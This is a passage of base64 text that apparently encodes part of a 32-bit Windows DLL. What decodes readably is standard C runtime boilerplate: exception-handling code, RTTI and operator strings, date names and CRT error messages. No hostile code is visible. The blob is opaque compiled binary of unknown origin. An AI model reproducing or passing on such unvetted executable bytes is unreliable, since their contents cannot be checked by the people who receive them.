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ZHluYW1pYyBpbml0aWFsaXplciBmb3IgJwAAYGVoIHZlY3RvciB2YmFzZSBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAABgb21uaSBjYWxsc2lnJwAAIGRlbGV0ZVtdAAAAIG5ld1tdAABgbG9jYWwgdmZ0YWJsZSBjb25zdHJ1Y3RvciBjbG9zdXJlJwBgbG9jYWwgdmZ0YWJsZScAYFJUVEkAAABgRUgAYHVkdCByZXR1cm5pbmcnAGBjb3B5IGNvbnN0cnVjdG9yIGNsb3N1cmUnAABgZWggdmVjdG9yIHZiYXNlIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAYGVoIHZlY3RvciBkZXN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmlydHVhbCBkaXNwbGFjZW1lbnQgbWFwJwAAYHZlY3RvciB2YmFzZSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAYHZlY3RvciBkZXN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAGBzY2FsYXIgZGVsZXRpbmcgZGVzdHJ1Y3RvcicAAAAAYGRlZmF1bHQgY29uc3RydWN0b3IgY2xvc3VyZScAAABgdmVjdG9yIGRlbGV0aW5nIGRlc3RydWN0b3InAAAAAGB2YmFzZSBkZXN0cnVjdG9yJwAAYHN0cmluZycAAAAAYGxvY2FsIHN0YXRpYyBndWFyZCcAAAAAYHR5cGVvZicAAAAAYHZjYWxsJwBgdmJ0YWJsZScAAABgdmZ0YWJsZScAAABePQAAfD0AACY9AAA8PD0APj49ACU9AAAvPQAALT0AACs9AAAqPQAAfHwAACYmAAB8AAAAXgAAAH4AAAAoKQAALAAAAD49AAA+AAAAPD0AADwAAAAlAAAALwAAAC0+KgAmAAAAKwAAAC0AAAAtLQAAKysAACoAAAAtPgAAb3BlcmF0b3IAAAAAW10AACE9AAA9PQAAIQAAADw8AAA+PgAAIGRlbGV0ZQAgbmV3AAAAAF9fdW5hbGlnbmVkAF9fcmVzdHJpY3QAAF9fcHRyNjQAX19jbHJjYWxsAAAAX19mYXN0Y2FsbAAAX190aGlzY2FsbAAAX19zdGRjYWxsAAAAX19wYXNjYWwAAAAAX19jZGVjbABfX2Jhc2VkKAAAAAA8CQEQNAkBECgJARAcCQEQEAkBEAQJARD4CAEQ8AgBEOQIARDYCAEQogIBEBwEARAABAEQ7AMBEMwDARCwAwEQ0AgBEMgIARCgAgEQxAgBEMAIARC8CAEQuAgBELQIARCwCAEQpAgBEKAIARCcCAEQmAgBEJQIARCQCAEQjAgBEIgIARCECAEQgAgBEHwIARB4CAEQdAgBEHAIARBsCAEQaAgBEGQIARBgCAEQXAgBEFgIARBUCAEQUAgBEEwIARBICAEQRAgBEEAIARA8CAEQOAgBEDQIARAwCAEQLAgBECgIARAcCAEQEAgBEAgIARD8BwEQ5AcBENgHARDEBwEQpAcBEIQHARBkBwEQRAcBECQHARAABwEQ5AYBEMAGARCgBgEQeAYBEFwGARBMBgEQSAYBEEAGARAwBgEQDAYBEAQGARD4BQEQ6AUBEMwFARCsBQEQhAUBEFwFARA0BQEQCAUBEOwEARDIBAEQpAQBEHgEARBMBAEQMAQBEKICARAuLi4AZC4BEIefABB6nwAQVW5rbm93biBleGNlcHRpb24AAABjc23gAQAAAAAAAAAAAAAAAwAAACAFkxkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAIAAgACAAIAAgACAAIAAgAGgAKAAoACgAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAYEBgQGBAYEBgQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBEAAQABAAEAAQABAAggGCAYIBggGCAYIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECARAAEAAQABAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAFAAU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SXQgaXMgbW9zdCBsaWtlbHkgdGhlIHJlc3VsdCBvZiBjYWxsaW5nIGFuIE1TSUwtY29tcGlsZWQgKC9jbHIpIGZ1bmN0aW9uIGZyb20gYSBuYXRpdmUgY29uc3RydWN0b3Igb3IgZnJvbSBEbGxNYWluLg0KAABSNjAzMg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBsb2NhbGUgaW5mb3JtYXRpb24NCgAAAAAAAFI2MDMxDQotIEF0dGVtcHQgdG8gaW5pdGlhbGl6ZSB0aGUgQ1JUIG1vcmUgdGhhbiBvbmNlLgpUaGlzIGluZGljYXRlcyBhIGJ1ZyBpbiB5b3VyIGFwcGxpY2F0aW9uLg0KAABSNjAzMA0KLSBDUlQgbm90IGluaXRpYWxpemVkDQoAAFI2MDI4DQotIHVuYWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9uIGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRhYmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAxOA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRpdGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJlYWQgZGF0YQ0KAA0KVGhpcyBhcHBsaWNhdGlvbiBoYXMgcmVxdWVzdGVkIHRoZSBSdW50aW1lIHRvIHRlcm1pbmF0ZSBpdCBpbiBhbiB1bnVzdWFsIHdheS4KUGxlYXNlIGNvbnRhY3QgdGhlIGFwcGxpY2F0aW9uJ3Mgc3VwcG9ydCB0ZWFtIGZvciBtb3JlIGluZm9ybWF0aW9uLg0KAAAAUjYwMDkNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgZW52aXJvbm1lbnQNCgBSNjAwOA0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBhcmd1bWVudHMNCgAAAFI2MDAyDQotIGZsb2F0aW5nIHBvaW50IHN1cHBvcnQgbm90IGxvYWRlZA0KAA